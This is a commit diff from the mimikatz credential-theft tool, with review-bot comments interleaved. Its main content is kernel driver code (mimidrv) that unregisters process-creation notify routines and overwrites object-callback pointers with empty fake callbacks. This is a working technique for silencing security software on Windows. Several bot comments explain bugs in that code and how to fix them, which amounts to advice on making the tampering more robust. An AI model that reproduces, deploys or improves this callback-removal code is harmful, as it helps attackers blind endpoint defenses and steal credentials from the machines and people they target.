minesweeper, Kerberos ccache, Windows 10 update, newsoft contre-rump,…
gentilkiwi committed Nov 20, 2014
1 parent 5d19161 commit d5676aa
Showing 44 changed files with 1,522 additions and 337 deletions.
3 changes: 3 additions & 0 deletions inc/globals.h
Expand Up @@ -17,6 +17,7 @@
#include <wchar.h>
#include "../modules/kull_m_output.h"
//#define KERBEROS_TOOLS
//#define DPAPI_TOOLS
//#define LSASS_DECRYPT
#define NET_MODULE
#ifdef _M_X64
Expand All @@ -29,6 +30,7 @@
#define MIMIKATZ_VERSION L"2.0 alpha"
#define MIMIKATZ_CODENAME L"Kiwi en C"
#define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") release \"" MIMIKATZ_CODENAME L"\" (" TEXT(__DATE__) L" " TEXT(__TIME__) L")"
#define MIMIKATZ_SPECIAL L" "
#define MIMIKATZ_DEFAULT_LOG MIMIKATZ L".log"
#define MIMIKATZ_DRIVER L"mimidrv"
#define MIMIKATZ_KERBEROS_EXT L"kirbi"
Expand Down Expand Up @@ -74,6 +76,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_BUILD_8 9200
#define KULL_M_WIN_BUILD_BLUE 9600
#define KULL_M_WIN_BUILD_10 9800
#define KULL_M_WIN_BUILD_10b 9879

#define KULL_M_WIN_MIN_BUILD_XP 2500
#define KULL_M_WIN_MIN_BUILD_2K3 3000
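Review bot: `KULL_M_WIN_BUILD_10b 9879` is added directly under `KULL_M_WIN_BUILD_10 9800` with nothing saying what the `b` suffix denotes or why code would need to distinguish the two builds; from the commit date this looks like a later Windows 10 Technical Preview build, but that is inferred, not stated. A short comment on the new line would settle it, e.g. `#define KULL_M_WIN_BUILD_10b 9879 /* later Windows 10 preview build (Nov 2014) */`, and whichever consumer keys off it should be named there if it is not obvious.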
3 changes: 3 additions & 0 deletions mimidrv/ioctl.h
Expand Up @@ -23,6 +23,9 @@
#define IOCTL_MIMIDRV_NOTIFY_REG_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x043, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define IOCTL_MIMIDRV_NOTIFY_OBJECT_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x044, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

#define IOCTL_MIMIDRV_NOTIFY_PROCESS_REMOVE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x045, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define IOCTL_MIMIDRV_NOTIFY_OBJECT_REMOVE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x049, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

#define IOCTL_MIMIDRV_FILTER_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x050, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define IOCTL_MIMIDRV_MINIFILTER_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x051, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

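Review bot: Both new codes inherit METHOD_NEITHER from the surrounding definitions, so the handlers they dispatch to (kkll_m_notify_remove_process / kkll_m_notify_remove_object) presumably receive the input buffer as a raw, unvalidated user-mode pointer rather than a kernel copy; nothing in this header records that obligation. A comment on the block would make it explicit, e.g. `/* METHOD_NEITHER: in/out buffers are unprobed user pointers - handlers must validate before dereferencing */`. The numbering also jumps from 0x045 to 0x049, leaving 0x046-0x048 unassigned between the two removal codes; if they are reserved for later additions a comment saying so would avoid an accidental collision.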
146 changes: 127 additions & 19 deletions mimidrv/kkll_m_notify.c
Expand Up @@ -13,6 +13,11 @@ PKKLL_M_MEMORY_OFFSETS pCmpCallBackOffsets = NULL;
POBJECT_DIRECTORY *ObpTypeDirectoryObject = NULL;
PKKLL_M_MEMORY_OFFSETS pObpTypeDirectoryObjectOffsets = NULL;

PPSSETCREATEPROCESSNOTIFYROUTINEEX pPsSetCreateProcessNotifyRoutineEx = NULL;
POB_PRE_OPERATION_CALLBACK kkll_m_notify_fakePre = NULL;
POB_POST_OPERATION_CALLBACK kkll_m_notify_fakePost = NULL;


#ifdef _M_X64
UCHAR PTRN_W23_Thread[] = {0x66, 0x90, 0x66, 0x90, 0x48, 0x8b, 0xce, 0xe8};
UCHAR PTRN_WVI_Thread[] = {0x49, 0x8b, 0x8c, 0x24, 0xf8, 0x01, 0x00, 0x00, 0x41, 0xb0, 0x01, 0x49, 0x8b, 0x94, 0x24, 0x88, 0x03, 0x00, 0x00};
Expand Down Expand Up @@ -286,24 +291,7 @@ NTSTATUS kkll_m_notify_list_object(PKIWI_BUFFER outBuffer)
if(KiwiOsIndex >= KiwiOsIndex_VISTA)
{
for(pCallbackEntry = *(POBJECT_CALLBACK_ENTRY *) (pType + pObpTypeDirectoryObjectOffsets->off3) ; NT_SUCCESS(status) && (pCallbackEntry != (POBJECT_CALLBACK_ENTRY) (pType + pObpTypeDirectoryObjectOffsets->off3)) ; pCallbackEntry = (POBJECT_CALLBACK_ENTRY) pCallbackEntry->CallbackList.Flink)
{
if(pCallbackEntry->PreOperation || pCallbackEntry->PostOperation)
{
status = kprintf(outBuffer, L"\t* Callback [type %u]\n", pCallbackEntry->Operations);
if(NT_SUCCESS(status) && pCallbackEntry->PreOperation)
{
status = kprintf(outBuffer, L"\t\tPreOperation : ");
if(NT_SUCCESS(status))
status = kkll_m_modules_fromAddr(outBuffer, pCallbackEntry->PreOperation);
}
if(NT_SUCCESS(status) && pCallbackEntry->PostOperation)
{
status = kprintf(outBuffer, L"\t\tPreOperation : ");
if(NT_SUCCESS(status))
status = kkll_m_modules_fromAddr(outBuffer, pCallbackEntry->PostOperation);
}
}
}
status = kkll_m_notify_desc_object_callback(pCallbackEntry, outBuffer);
}
for(j = 0; NT_SUCCESS(status) && (j < 8) ; j++)
{
Expand All @@ -319,4 +307,124 @@ NTSTATUS kkll_m_notify_list_object(PKIWI_BUFFER outBuffer)
}
}
return status;
}
}

NTSTATUS kkll_m_notify_desc_object_callback(POBJECT_CALLBACK_ENTRY pCallbackEntry, PKIWI_BUFFER outBuffer)
{
NTSTATUS status = STATUS_SUCCESS;
if(pCallbackEntry->PreOperation || pCallbackEntry->PostOperation)
{
status = kprintf(outBuffer, L"\t* Callback [type %u] - Handle 0x%p (@ 0x%p)\n", pCallbackEntry->Operations, pCallbackEntry->Handle, pCallbackEntry);
if(NT_SUCCESS(status) && pCallbackEntry->PreOperation)
{
status = kprintf(outBuffer, L"\t\tPreOperation : ");
if(NT_SUCCESS(status))
status = kkll_m_modules_fromAddr(outBuffer, pCallbackEntry->PreOperation);
}
if(NT_SUCCESS(status) && pCallbackEntry->PostOperation)
{
status = kprintf(outBuffer, L"\t\tPreOperation : ");
if(NT_SUCCESS(status))
status = kkll_m_modules_fromAddr(outBuffer, pCallbackEntry->PostOperation);
}
}
return status;
}


UNICODE_STRING uPsSetCreateProcessNotifyRoutineEx = {66, 68, L"PsSetCreateProcessNotifyRoutineEx"};
NTSTATUS kkll_m_notify_init()
{
SIZE_T codeSize;
NTSTATUS status = STATUS_NOT_FOUND;
if(pPsSetCreateProcessNotifyRoutineEx = (PPSSETCREATEPROCESSNOTIFYROUTINEEX) MmGetSystemRoutineAddress(&uPsSetCreateProcessNotifyRoutineEx))

codeSize = (ULONG_PTR) kkll_m_notify_fake_ObjectPreCallback_end - (ULONG_PTR) kkll_m_notify_fake_ObjectPreCallback;
if(kkll_m_notify_fakePre = (POB_PRE_OPERATION_CALLBACK) ExAllocatePoolWithTag(NonPagedPool, codeSize, POOL_TAG))
RtlCopyMemory(kkll_m_notify_fakePre, kkll_m_notify_fake_ObjectPreCallback, codeSize);

codeSize = (ULONG_PTR) kkll_m_notify_fake_ObjectPostCallback_end - (ULONG_PTR) kkll_m_notify_fake_ObjectPostCallback;
if(kkll_m_notify_fakePost = (POB_POST_OPERATION_CALLBACK) ExAllocatePoolWithTag(NonPagedPool, codeSize, POOL_TAG))
RtlCopyMemory(kkll_m_notify_fakePost, kkll_m_notify_fake_ObjectPostCallback, codeSize);


if(pPsSetCreateProcessNotifyRoutineEx && kkll_m_notify_fakePre && kkll_m_notify_fakePost)
status = STATUS_SUCCESS;
else
{
if(kkll_m_notify_fakePre)
{
ExFreePoolWithTag(kkll_m_notify_fakePre, POOL_TAG);
kkll_m_notify_fakePre = NULL;
}
if(kkll_m_notify_fakePost)
{
ExFreePoolWithTag(kkll_m_notify_fakePost, POOL_TAG);
kkll_m_notify_fakePost = NULL;
}
}
return status;
}

NTSTATUS kkll_m_notify_remove_process(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)
{
NTSTATUS status = STATUS_INVALID_HANDLE;
UNICODE_STRING uString;

if(bufferIn && (szBufferIn == sizeof(PCREATE_PROCESS_NOTIFY_ROUTINE)))
{
status = PsSetCreateProcessNotifyRoutine(*(PCREATE_PROCESS_NOTIFY_ROUTINE *) bufferIn, TRUE);
if(pPsSetCreateProcessNotifyRoutineEx)
status = pPsSetCreateProcessNotifyRoutineEx(*(PCREATE_PROCESS_NOTIFY_ROUTINE_EX *) bufferIn, TRUE);

if(NT_SUCCESS(status))
{
status = kprintf(outBuffer, L"Removed : ");
if(NT_SUCCESS(status))
status = kkll_m_modules_fromAddr(outBuffer, *(PVOID *) bufferIn);
}

}
return status;
}


NTSTATUS kkll_m_notify_remove_object(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer)
{
NTSTATUS status = STATUS_INVALID_HANDLE;
POBJECT_CALLBACK_ENTRY pCallbackEntry;

if(bufferIn && (szBufferIn == sizeof(POBJECT_CALLBACK_ENTRY)))
{
if(pCallbackEntry = *(POBJECT_CALLBACK_ENTRY *) bufferIn)
{
status = kkll_m_notify_desc_object_callback(pCallbackEntry, outBuffer);
if(NT_SUCCESS(status))
{
if(pCallbackEntry->PreOperation && kkll_m_notify_fakePre)
pCallbackEntry->PreOperation = kkll_m_notify_fakePre;
if(pCallbackEntry->PostOperation && kkll_m_notify_fakePost)
pCallbackEntry->PostOperation = kkll_m_notify_fakePost;

status = kkll_m_notify_desc_object_callback(pCallbackEntry, outBuffer);
}
}
}


return status;
}

#pragma optimize("", off)
OB_PREOP_CALLBACK_STATUS kkll_m_notify_fake_ObjectPreCallback(IN PVOID RegistrationContext, IN POB_PRE_OPERATION_INFORMATION OperationInformation)
{
return OB_PREOP_SUCCESS;
}
DWORD kkll_m_notify_fake_ObjectPreCallback_end(){return 'kpre';}


VOID kkll_m_notify_fake_ObjectPostCallback(IN PVOID RegistrationContext, IN POB_POST_OPERATION_INFORMATION OperationInformation)
{
}
DWORD kkll_m_notify_fake_ObjectPostCallback_end(){return 'kpos';}
#pragma optimize("", on)
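Review bot: In kkll_m_notify_init the brace-less `if(pPsSetCreateProcessNotifyRoutineEx = (PPSSETCREATEPROCESSNOTIFYROUTINEEX) MmGetSystemRoutineAddress(...))` has the following `codeSize = ...` assignment as its only body, so when the lookup returns NULL, codeSize is left uninitialized and ExAllocatePoolWithTag/RtlCopyMemory run with a garbage size before the NULL check at the end rejects the init. Since the result is already checked later, the conditional should become a plain assignment: `pPsSetCreateProcessNotifyRoutineEx = (PPSSETCREATEPROCESSNOTIFYROUTINEEX) MmGetSystemRoutineAddress(&uPsSetCreateProcessNotifyRoutineEx);`. The new helper kkll_m_notify_desc_object_callback also carries over the copy-paste label on the PostOperation branch, which should read `status = kprintf(outBuffer, L"\t\tPostOperation : ");`. In kkll_m_notify_remove_process the Ex call unconditionally overwrites the status of the non-Ex removal, so a routine successfully removed by the first call is reported as a failure if the second call rejects it; `if(!NT_SUCCESS(status) && pPsSetCreateProcessNotifyRoutineEx)` keeps the first success. Finally, kkll_m_notify_remove_object writes two pointers through whatever address the caller put in bufferIn without checking that it is one of the entries kkll_m_notify_list_object walks or even a kernel-mode address, so a malformed request from anyone able to open the device becomes an arbitrary kernel write; a membership check against the ObpTypeDirectoryObject callback lists (or at minimum a __try/__except around the access) would make the IOCTL fail cleanly instead.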
15 changes: 14 additions & 1 deletion mimidrv/kkll_m_notify.h
Expand Up @@ -39,11 +39,24 @@ typedef struct _OBJECT_CALLBACK_ENTRY {
/* ... */
} OBJECT_CALLBACK_ENTRY, *POBJECT_CALLBACK_ENTRY;

typedef NTSTATUS (* PPSSETCREATEPROCESSNOTIFYROUTINEEX) ( __in PCREATE_PROCESS_NOTIFY_ROUTINE_EX NotifyRoutine, __in BOOLEAN Remove);
//typedef VOID (* POBUNREGISTERCALLBACKS) (__in PVOID RegistrationHandle);

NTSTATUS kkll_m_notify_init();
NTSTATUS kkll_m_notify_list_thread(PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_list_process(PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_list_image(PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_list_reg(PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_list_object(PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_desc_object_callback(POBJECT_CALLBACK_ENTRY pCallbackEntry, PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_remove_process(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer);
NTSTATUS kkll_m_notify_remove_object(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer);

NTSTATUS kkll_m_notify_list(PKIWI_BUFFER outBuffer, PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax);
NTSTATUS kkll_m_notify_search(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax, PKKLL_M_MEMORY_OFFSETS * pOffsets);
NTSTATUS kkll_m_notify_search(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax, PKKLL_M_MEMORY_OFFSETS * pOffsets);


OB_PREOP_CALLBACK_STATUS kkll_m_notify_fake_ObjectPreCallback(IN PVOID RegistrationContext, IN POB_PRE_OPERATION_INFORMATION OperationInformation);
DWORD kkll_m_notify_fake_ObjectPreCallback_end();
VOID kkll_m_notify_fake_ObjectPostCallback(IN PVOID RegistrationContext, IN POB_POST_OPERATION_INFORMATION OperationInformation);
DWORD kkll_m_notify_fake_ObjectPostCallback_end();
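Review bot: The new prototypes `NTSTATUS kkll_m_notify_init();`, `DWORD kkll_m_notify_fake_ObjectPreCallback_end();` and `DWORD kkll_m_notify_fake_ObjectPostCallback_end();` declare unspecified parameter lists, not empty ones, so C performs no argument checking at their call sites; they should be written `(void)`, e.g. `NTSTATUS kkll_m_notify_init(void);`. Nothing in the header says that the fake callbacks and their `_end` twins exist only as address markers for the byte copy in kkll_m_notify_init, so a reader may well remove the apparently useless `_end` functions; a one-line comment above the group, such as `/* fake callbacks copied into non-paged pool by kkll_m_notify_init; the _end functions only bound the copied range */`, would prevent that. The commented-out POBUNREGISTERCALLBACKS typedef should be dropped or given a reason rather than left as dead code.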
9 changes: 9 additions & 0 deletions mimidrv/mimidrv.c
Expand Up @@ -39,6 +39,9 @@ NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRe
pDeviceObject->Flags &= ~DO_DEVICE_INITIALIZING;
IoCreateSymbolicLink(&uStrDosDeviceName, &uStrDriverName);
status = AuxKlibInitialize();

if(KiwiOsIndex >= KiwiOsIndex_VISTA)
status = kkll_m_notify_init();
}
}
return status;
Expand Down Expand Up @@ -113,6 +116,12 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR
case IOCTL_MIMIDRV_NOTIFY_OBJECT_LIST:
status = kkll_m_notify_list_object(&kOutputBuffer);
break;
case IOCTL_MIMIDRV_NOTIFY_PROCESS_REMOVE:
status = kkll_m_notify_remove_process(szBufferIn, bufferIn, &kOutputBuffer);
break;
case IOCTL_MIMIDRV_NOTIFY_OBJECT_REMOVE:
status = kkll_m_notify_remove_object(szBufferIn, bufferIn, &kOutputBuffer);
break;

case IOCTL_MIMIDRV_FILTER_LIST:
status = kkll_m_filters_list(&kOutputBuffer);
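Review bot: The added `status = kkll_m_notify_init();` in DriverEntry overwrites the status returned by AuxKlibInitialize on the line just above it, so a failed AuxKlib initialization is masked whenever the notify init succeeds; guard it as `if(NT_SUCCESS(status) && (KiwiOsIndex >= KiwiOsIndex_VISTA)) status = kkll_m_notify_init();`. It is also worth deciding whether a failing kkll_m_notify_init (STATUS_NOT_FOUND when PsSetCreateProcessNotifyRoutineEx cannot be resolved, or a pool allocation failure) should make DriverEntry fail at all, since that now blocks loading the whole driver for one optional feature, and whether the device object and symbolic link created above this hunk are released on that path, which cannot be seen from here. The two new IOCTL cases pass szBufferIn/bufferIn straight to handlers that dereference the buffer as a pointer-sized value; unless the dispatch prologue outside this hunk probes and captures the METHOD_NEITHER buffer, that dereference runs on an unvalidated user pointer. DriverEntry and MimiDispatchDeviceControl both start and end outside the hunks shown.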
3 changes: 2 additions & 1 deletion mimikatz/mimikatz.c
Expand Up @@ -19,6 +19,7 @@ const KUHL_M * mimikatz_modules[] = {
&kuhl_m_misc,
&kuhl_m_token,
&kuhl_m_vault,
&kuhl_m_minesweeper,
#ifdef NET_MODULE
&kuhl_m_net,
#endif
Expand All @@ -41,7 +42,7 @@ int wmain(int argc, wchar_t * argv[])
L" ## / \\ ## /* * *\n"
L" ## \\ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )\n"
L" '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)\n"
L" '#####' Microsoft BlueHat edition! with %2u modules * * */\n\n", ARRAYSIZE(mimikatz_modules));
L" '#####' " MIMIKATZ_SPECIAL L" with %2u modules * * */\n\n", ARRAYSIZE(mimikatz_modules));

mimikatz_initOrClean(TRUE);
for(i = MIMIKATZ_AUTO_COMMAND_START ; (i < argc) && (status != STATUS_FATAL_APP_EXIT) ; i++)
1 change: 1 addition & 0 deletions mimikatz/mimikatz.h
Expand Up @@ -19,6 +19,7 @@
#include "modules/kuhl_m_misc.h"
#include "modules/kuhl_m_token.h"
#include "modules/kuhl_m_vault.h"
#include "modules/kuhl_m_minesweeper.h"
#ifdef NET_MODULE
#include "modules/kuhl_m_net.h"
#endif
6 changes: 6 additions & 0 deletions mimikatz/mimikatz.vcxproj
Expand Up @@ -88,6 +88,7 @@
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ItemGroup>
<ClCompile Include="..\modules\kull_m_asn1.c" />
<ClCompile Include="..\modules\kull_m_dpapi.c" />
<ClCompile Include="..\modules\kull_m_file.c" />
<ClCompile Include="..\modules\kull_m_handle.c" />
<ClCompile Include="..\modules\kull_m_kernel.c" />
Expand All @@ -104,6 +105,7 @@
<ClCompile Include="..\modules\kull_m_token.c" />
<ClCompile Include="mimikatz.c" />
<ClCompile Include="modules\kerberos\kuhl_m_kerberos.c" />
<ClCompile Include="modules\kerberos\kuhl_m_kerberos_ccache.c" />
<ClCompile Include="modules\kerberos\kuhl_m_kerberos_pac.c" />
<ClCompile Include="modules\kerberos\kuhl_m_kerberos_ticket.c" />
<ClCompile Include="modules\kuhl_m_crypto.c" />
Expand All @@ -121,6 +123,7 @@
<ClCompile Include="modules\kuhl_m_token.c" />
<ClCompile Include="modules\kuhl_m_ts.c" />
<ClCompile Include="modules\kuhl_m_vault.c" />
<ClCompile Include="modules\kuhl_m_minesweeper.c" />
<ClCompile Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt5.c" />
<ClCompile Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt6.c" />
<ClCompile Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt63.c" />
Expand All @@ -138,6 +141,7 @@
<ItemGroup>
<ClInclude Include="..\modules\kull_m_asn1.h" />
<ClInclude Include="..\modules\kull_m_crypto_system.h" />
<ClInclude Include="..\modules\kull_m_dpapi.h" />
<ClInclude Include="..\modules\kull_m_file.h" />
<ClInclude Include="..\modules\kull_m_handle.h" />
<ClInclude Include="..\modules\kull_m_kernel.h" />
Expand All @@ -157,6 +161,7 @@
<ClInclude Include="..\modules\kull_m_token.h" />
<ClInclude Include="mimikatz.h" />
<ClInclude Include="modules\kerberos\kuhl_m_kerberos.h" />
<ClInclude Include="modules\kerberos\kuhl_m_kerberos_ccache.h" />
<ClInclude Include="modules\kerberos\kuhl_m_kerberos_pac.h" />
<ClInclude Include="modules\kerberos\kuhl_m_kerberos_ticket.h" />
<ClInclude Include="modules\kuhl_m.h" />
Expand All @@ -175,6 +180,7 @@
<ClInclude Include="modules\kuhl_m_token.h" />
<ClInclude Include="modules\kuhl_m_ts.h" />
<ClInclude Include="modules\kuhl_m_vault.h" />
<ClInclude Include="modules\kuhl_m_minesweeper.h" />
<ClInclude Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt5.h" />
<ClInclude Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt6.h" />
<ClInclude Include="modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt63.h" />
18 changes: 18 additions & 0 deletions mimikatz/mimikatz.vcxproj.filters
Expand Up @@ -140,6 +140,15 @@
<ClCompile Include="modules\kuhl_m_service_remote.c">
<Filter>local modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_dpapi.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="modules\kerberos\kuhl_m_kerberos_ccache.c">
<Filter>local modules\kerberos</Filter>
</ClCompile>
<ClCompile Include="modules\kuhl_m_minesweeper.c">
<Filter>local modules</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="mimikatz.h" />
Expand Down Expand Up @@ -299,6 +308,15 @@
<ClInclude Include="modules\kuhl_m_service_remote.h">
<Filter>local modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_dpapi.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="modules\kerberos\kuhl_m_kerberos_ccache.h">
<Filter>local modules\kerberos</Filter>
</ClInclude>
<ClInclude Include="modules\kuhl_m_minesweeper.h">
<Filter>local modules</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Filter Include="local modules">